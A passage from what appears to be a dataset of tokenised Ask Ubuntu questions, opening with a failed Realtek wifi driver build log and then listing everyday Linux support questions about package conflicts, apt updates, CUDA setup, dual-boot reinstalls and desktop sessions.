/home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_recv.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_linux.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_sreset.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_xmit.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/osdep_service.o cc [ m ] /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : in function ‘rtw_proc_init_one’ : /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:3 : error : implicit declaration of function ‘create_proc_entry’ [ -werror=implicit-function-declaration ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:11 : warning : assignment makes pointer from integer without a cast [ enabled by default ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:3 : error : implicit declaration of function ‘create_proc_read_entry’ [ -werror=implicit-function-declaration ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:326:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` log_level '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:332:8 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_log_level ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:348:21 : warning : assignment makes pointer from integer without a cast [ enabled by default ] padapter- > dir_dev = create_proc_entry ( dev- > name , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:379:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` write_reg '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:385:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_write_reg ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:387:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` read_reg '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:393:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_read_reg ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:396:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` fwstate '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:404:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sec_info '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:412:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mlmext_state '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:420:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` qos_option '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:427:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_option '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:434:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_info '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:441:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ap_info '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:448:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` adapter_state '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:455:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` trx_info '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:462:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:469:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:476:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:483:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:490:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:497:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:504:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:511:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:520:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:527:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump4 '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:537:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` all_sta_info '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:555:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` best_channel '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:561:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_best_channel ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:564:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_signal '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:570:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_signal ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:572:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_enable '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:578:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ht_enable ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:580:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` cbw40_enable '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:586:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_cbw40_enable ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:588:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ampdu_enable '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:594:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ampdu_enable ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:596:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_stbc '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:602:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_stbc ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:605:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` path_rssi '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:608:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` vid '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:615:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` pid '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:622:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rssi_disp '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:628:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rssi_disp ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:631:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sreset '' , s_ifreg | s_irugo , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:637:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_sreset ; ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : at top level : /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:999:2 : warning : initialization from incompatible pointer type [ enabled by default ] .ndo_select_queue = rtw_select_queue , ^ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:999:2 : warning : ( near initialization for ‘rtw_netdev_ops.ndo_select_queue’ ) [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o ] error 1 make [ 1 ] : *** [ _module_/home/zerberus/rtl8188c/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-36-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # '' also tried compiling the dkms driver but getting the following error . building initial module for 3.13.0-36-generic error ! bad return status for module build on kernel : 3.13.0-36-generic ( i686 ) consult /var/lib/dkms/rtl8192cu-tjp/1.6/build/make.log for more information . i am not sure what else i can do .
523199	how can i use both new and old versions of vlc requiring different libs ?	i have old version of vlc installed ( depends on libeml3 , libmatroska5 ) and want to install latest one ( depends on libeml4 , libmatroska6 ) without deleting previous but get errors about these libraries ( newer libraries dislike older ones ) .
523201	apt-get update is updating the same files again and again	i just got a new linuxmint 17 , and after i did all the first updates , i always get these ones : sudo apt-get update ign htt p : //packages.linuxmint.com qiana inrelease ign ht tp : //archive.ubuntu.com trusty inrelease ign htt p : //extra.linuxmint.com qiana inrelease ign ht tp : //security.ubuntu.com trusty-security inrelease ign ht tp : //archive.canonical.com trusty inrelease holen : 1 ht tp : //packages.linuxmint.com qiana release.gpg [ 198 b ] holen : 2 h ttp : //extra.linuxmint.com qiana release.gpg [ 198 b ] ign ht tp : //archive.ubuntu.com trusty-updates inrelease holen : 3 ht tp : //security.ubuntu.com trusty-security release.gpg [ 933 b ] holen : 4 ht tp : //packages.linuxmint.com qiana release [ 18.6 kb ] ign ht tp : //download.tuxfamily.org precise inrelease holen : 5 ht tp : //extra.linuxmint.com qiana release [ 3,144 b ] holen : 6 ht tp : //security.ubuntu.com trusty-security release [ 59.7 kb ] ok ht tp : //archive.canonical.com trusty release.gpg ok ht tp : //archive.ubuntu.com trusty release.gpg holen : 7 ht tp : //extra.linuxmint.com qiana/main amd64 packages [ 7,904 b ] ok ht tp : //archive.canonical.com trusty release holen : 8 ht tp : //security.ubuntu.com trusty-security/main amd64 packages [ 139 kb ] holen : 9 htt p : //packages.linuxmint.com qiana/main amd64 packages [ 30.4 kb ] holen : 10 ht tp : //download.tuxfamily.org precise release.gpg [ 198 b ] holen : 11 ht tp : //archive.ubuntu.com trusty-updates release.gpg [ 933 b ] ok htt p : //archive.canonical.com trusty/partner amd64 packages holen : 12 ht tp : //security.ubuntu.com trusty-security/restricted amd64 packages [ 14 b ] holen : 13 ht tp : //security.ubuntu.com trusty-security/universe amd64 packages [ 47.2 kb ] holen : 1 4 ht tp : //download.tuxfamily.org precise release [ 4,043 b ] ok htt p : // archive.ubuntu.com trusty release holen : 15 ht tp : //packages.linuxmint.com qiana/upstream amd64 packages [ 23.8 kb ] holen : 16 ht tp : //archive.ubuntu.com trusty-updates release [ 59.7 kb ] holen : 17 ht tp : //packages.linuxmint.com qiana/import amd64 packages [ 32.5 kb ] holen : 18 ht tp : //download.tuxfamily.org precise/cairo-dock amd64 packages [ 5,944 b ] ok ht tp : //archive.canonical.com trusty/partner i386 packages ok ht tp : //archive.ubuntu.com trusty/main amd64 packages holen : 19 htt p : //packages.linuxmint.com qiana/main i386 packages [ 29.7 kb ] holen : 20 htt p : //download.tuxfamily.org precise/cairo-dock i386 packages [ 5,919 b ] holen : 21 ht tp : //extra.linuxmint.com qiana/main i386 packages [ 7,888 b ] holen : 22 ht tp : //security.ubuntu.com trusty-security/multiverse amd64 packages [ 1,148 b ] ok htt p : //archive.ubuntu.com trusty/restricted amd64 packages holen : 23 htt p : //packages.linuxmint.com qiana/upstream i386 packages [ 23.8 kb ] holen : 2 4 ht tp : //security.ubuntu.com trusty-security/main i386 packages [ 133 kb ] ok htt p : // archive.ubuntu.com trusty/universe amd64 packages holen : 25 ht tp : //packages.linuxmint.com qiana/import i386 packages [ 32.5 kb ] holen : 26 ht tp : //security.ubuntu.com trusty-security/restricted i386 packages [ 14 b ] holen : 27 ht tp : //security.ubuntu.com trusty-security/universe i386 packages [ 47.2 kb ] ok htt p : //archive.ubuntu.com trusty/multiverse amd64 packages holen : 2 8 h t tp : //security.ubuntu.com trusty-security/multiverse i386 packages [ 1,398 b ] ok htt p : //archive.ubuntu.com trusty/main i386 packages ok htt p : //security.ubuntu.com trusty-security/main translation-en ign http : //archive.canonical.com trusty/partner translation-en ok htt p : //security.ubuntu.com trusty-security/multiverse translation-en ok htt p : //archive.ubuntu.com trusty/restricted i386 packages ok htt p : //security.ubuntu.com trusty-security/restricted translation-en ok htt p : //archive.ubuntu.com trusty/universe i386 packages ok htt p : //security.ubuntu.com trusty-security/universe translation-en ok htt p : //archive.ubuntu.com trusty/multiverse i386 packages ok htt p : //archive.ubuntu.com trusty/main translation-de ign http : //extra.linux mint.com qiana/main translation-de_de ok htt p : //archive.u buntu.com trusty/main translation-en ign http : //extra.lin uxmint.com qiana/main translation-de ign http : //extra.li nuxmint.com qiana/main translation-en ok htt p : //archive . ubuntu.com trusty/multiverse translation-de ok htt p : //archiv e.ubuntu.com trusty/multiverse translation-en ign http : //downlo ad.tuxfamily.org precise/cairo-dock translation-de_de ok htt p : //arch ive.ubuntu.com trusty/restricted translation-de ign htt p : //down load.tuxfamily.org precise/cairo-dock translation-de ok htt p : //a rchive.ubuntu.com trusty/restricted translation-en ign http : //d ownload.tuxfamily.org precise/cairo-dock translation-en ok htt p : // archive.ubuntu.com trusty/universe translation-de ok http : // archive.ubuntu.com trusty/universe translation-en holen : 29 http : // archive.ubuntu.com trusty-updates/main amd64 packages [ 316 kb ] holen : 30 http : // archive.ubuntu.com trusty-updates/restricted amd64 packages [ 5,820 b ] holen : 31 http : // archive.ubuntu.com trusty-updates/universe amd64 packages [ 201 kb ] holen : 32 http : // archive.ubuntu.com trusty-updates/multiverse amd64 packages [ 9,373 b ] ign http : // packages.linuxmint.com qiana/import translation-de_de holen : 33 http : // archive.ubuntu.com trusty-updates/main i386 packages [ 310 kb ] ign http : // packages.linuxmint.com qiana/import translation-de holen : 34 http : // archive.ubuntu.com trusty-updates/restricted i386 packages [ 5,820 b ] ign http : // packages.linuxmint.com qiana/import translation-en ign http : // packages.linuxmint.com qiana/main translation-de_de holen : 35 http : // archive.ubuntu.com trusty-updates/universe i386 packages [ 202 kb ] ign http : // packages.linuxmint.com qiana/main translation-de holen : 36 http : // archive.ubuntu.com trusty-updates/multiverse i386 packages [ 9,545 b ] ign http : // packages.linuxmint.com qiana/main translation-en ign http : // packages.linuxmint.com qiana/upstream translation-de_de ok http : // archive.ubuntu . com trusty-updates/main translation-en ign http : // packages.linuxmint . com qiana/upstream translation-de ign http : // packages.linuxmint . com qiana/upstream translation-en ok http : // archive.ubuntu . com trusty-updates/multiverse translation-en ok http : // archive.ubuntu . com trusty-updates/restricted translation-en ok http : // archive.ubuntu . com trusty-updates/universe translation-en ign http : // archive.ubuntu . com trusty/main translation-de_de ign http : // archive.ubuntu . com trusty/multiverse translation-de_de ign http : // archive.ubuntu . com trusty/restricted translation-de_de ign http : // archive.ubuntu . com trusty/universe translation-de_de es wurden 1,776 kb in 33 s geholt ( 52.5 kb/s ) . paketlisten werden gelesen ... fertig i did this now several times , and its a never ending updating . does anybody know what this means ? thanks
523202	reformat a freebie usb stick that thinks it is a cdrom	i received a usb pen drive at a conference recently , containing presentations and the like . i would like to reformat it for personal use , but every computer i put it in sees it as if it were a cd-rom . does anyone know of a way to get around this and reformat the drive ? the relevant line ( s ) from the lsblk command is : name maj : min rm size ro type mountpoint sr0 11:0 1 548.5m 0 rom and the device itself shows up as : brw-rw -- -- + 1 root cdrom 11 , 0 sep 12 06:08 /dev/sr0
523203	`` devicequery error cudagetdevicecount returned 10 invalid device ordinal '' on ubuntu 14.04 dell xps 15	i am trying to install nvidia_340 driver and cuda on my dell xps 15 with geforce 750m and ubuntu 14.04.01 lts and following install instructions here and here i am running into problems using devicequery : error when running cuda samples : ./devicequery starting ... cuda device query ( runtime api ) version ( cudart static linking ) cudagetdevicecount returned 10 - > invalid device ordinal result = fail here is more information about my system : file permissions of nvidia files in /dev/ ( i have added script from here into my rc.local to generate missing nvidia files in /dev/ ) : crw-rw-rw- 1 root root 195 , 0 sep 12 13:28 nvidia0 crw-rw-rw- 1 root root 195 , 255 sep 12 13:28 nvidiactl crw-rw-rw- 1 root root 250 , 0 sep 12 13:28 nvidia-uvm lsmod | grep nouveau returns empty lsmod | grep nvidia returns the following : nvidia_uvm 35066 0 nvidia 10540162 1 nvidia_uvm drm 303102 5 i915 , drm_kms_helper , nvidia lspci | grep vga returns the following : 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) lspci | grep nvidia returns the following : 02:00.0 3d controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 ) am i missing something obvious here ?
523204	simple scan does not appear in startup 14.04	i wanted to scan a document . connected the scanner and then looked for a software on my 14.04 to work it . it seems like i have simple scan of sane installed , but ca n't find it . when looking for applications in the startup menu nothing at all appears . when searching for scanner or similar i get references . think somehing is wrong with the startup ( not sure of the term , my os is in spanish and its called inicio ) . would appreciate a tip on how to run any application that is not clearly visible , but right now need to find the scanner . thanks .
523207	how to reinstall windows that 's on dual-boot with ubuntu	this might have already been answered before but i ca n't find the thread . so if yes , please reply the link . currently , i have an windows dual boot with ubuntu . i am having issues with windows and i need to reinstall it . how do i do that without affecting ubuntu ? the only method i know is by using the installer disk . is there any other way to reformat windows that wo n't affect ubuntu ? i will have a lot of work just installing windows and a lot of program . i do n't want to mess up with ubuntu and reinstall everything . thanks !
523208	what exactly do the terms nomodeset , dual boot an wubi mean ?	i am having this really weird problem of booting my computer ( ubuntu 14.04 , which i upgraded to from 12.04 just a day back ) since it shows up a black screen every time , after i have chosen my os ( i have xp and ubuntu ) .so i found this site which addresses problems that seem similar.but it has these terms over here which i need some help in understanding .
523209	processing time to delete files from linux-installed partition	recently i observed that the time taken for my laptop ( 2gb ram laptop on intel core2 duo processor ) to delete folders consisting of a lot of files and subdirectories took considerable time ( for example boost library folders it takes two minutes ) on a partition on which i have installed linux ( ubuntu 14.04 ) . where as on my other hard-disk partitions it takes no time at all ( less than a second ) . on the hard-disk i believe it just loses a marker to that memory region and declares it empty and thus it takes minimal time . my question what happens on the partition on which i have installed the ubuntu ( 14.04 ) ? does it matter what kind format each of those partitions are set to ? thanks : ) p.s . a copy operation , obviously , takes about the same time
523210	1.5gb ram with pentium 4 for ubuntu 14.04 lts	i have an old desktop with 1.5gb ram and pentium 4 ? would ubuntu 14.04 work fine or i need to downgrade to xubuntu or lubuntu ? it would be fine per the hardware requirements specs for 14.04 but was wondering what are your experiences ? the reason i am asking is i already installed 14.04 on this hardware ( dual boot with windows ) , and i frequently getting some `` system program failure '' error while running webbrowser or at the home screen , which points to something like `` kernel paging request error @ some address '' , so i was wondering if this was due to the lack of ram ? i can get the exact syntax of error later . thanks ,
523212	why do i have this start session ?	hi everyone , i have this problem . i install ubuntu mate in my ubuntu 14.04 lts , but do n't like it , so i remove it from ubuntu . the problem is that i have this start up panel and i want the default ubuntu unity.. any help will be much appreciated . thank you .
523213	how do i get lightdm on suspend from awesome/gnome session ?	i am using awesomewm as my windows manager on ubuntu 14.04 and use the gnome settings daemons for power , wifi , etc . when i close the lid , my computer suspends . when i open it back up , it does not display lightdm as it did in unity . how do i get it to do this ? i have confirmed the settings in gnome-control-center are set to suspend on lid close . here is my xinitrc : # ! /usr/env/bin/bash redshift & xrdb -merge .xresources & gnome-settings-daemon & # handles themes , starts gnome-screensaver . you may have to use gconf to disable it setting the background . nm-applet & # assuming you 're using network manager gnome-power-manager & # for laptops and stuff gnome-volume-manager & # for mounting cds , usb sticks , and such eval `gnome-keyring-daemon` # ssh/gpg agent exec awesome # awesome receives xinit 's process id ; when it terminates , x will be terminated i 'm pretty sure word for word from the awesome wiki . thoughts ?
523216	copy from remote tmux+vim to local clipboard	i use kubuntu and sometimes i ssh out into a server and attach to a tmux session there . is there any way i can select -using the mouse or the keyboard- a large chunk of text ( more than une screen long , at least ) from vim or the shell and get it into my local system 's clipboard ?
523219	ubuntu freezes on the login screen after i close my laptop lid ubuntu 14.04	i experience a bug where the login screen does n't work correctly after i closed the laptop lid . when i open it again the login screen appears and i can move the cursor but i can not click anything or enter something via the keyboard . the only thing i can do is killing it and restart - > then everything works normally . the bug does not appear when i logout without closing the lid . but if i log out and close it afterwards the same problem appears . i use a sony vaio with an nvidia geforce and an intel i5 .
523221	erase and re-install	i have switched fully to ubuntu . i have added to many additional items and would simply like to perform an erase and reinstall . however , i can only find install packages that boot from windows or mac . is there none for installing ubuntu from ubuntu ?
523222	multiple clocks on desktop	i need to constantly check time for multiples timezones , i run kubuntu and i need to change the timezone every time to do that ( or check on the web ) . i could n't find any app that could show multiples clocks for different timezones on my desktop , is there any app of this kind ?
523226	install crossbuild-essential-armhf on amd64	right now , while working on my laptop ( amd64 ) , i can already compile code thru ssh on a beaglebone ( armhf ) . what i 'm trying to do now , is being able to use any ide to debug that code ( codeblocks , kdevelop or qtcreator ) . so , i thought of running a gdbserver on the beaglebone , and connecting to it , but it gives me an error of unexpected value on reply . i read about it , and it seems i need to locally build an armhf executable , for gdb to process . but i guess it also needs an armhf-oriented gdb built for amd64 , so i tried installing crossbuild-essential-armhf . for that , i added the armhf architecture with dpkg -- add-architecture armhf , but then i 'm unable to do an apt-get update . i get a whole lot of these : err http : //security.ubuntu.com trusty-security/main armhf packages 404 not found [ ip : 2001:67c:1562 : :13 80 ] if i check the repos , they indeed do not have armhf anywhere ... so , what am i doing wrong ? also , is this the correct way to remote debug with a different architecture , or is there any better way to do it ? thank you .
523227	ubuntu install do n't recognizes	i have installed windows 7 on my samsung evo ssd . now i 'm trying to install ubuntu but the installer does n't see partitions on my ssd . i have tried to rebuild the gtp but it did n't help . does someone have an answer ? the message i get this comuter currently has no detected operating systems
523230	iconbar does not disappear when going fullscreen ( opengl ) .	i am currently developing a game for ubuntu using libgdx/lwjgl , but when i enable fullscreen the iconbar does not disappear . how can i get rid of it ? thanks !
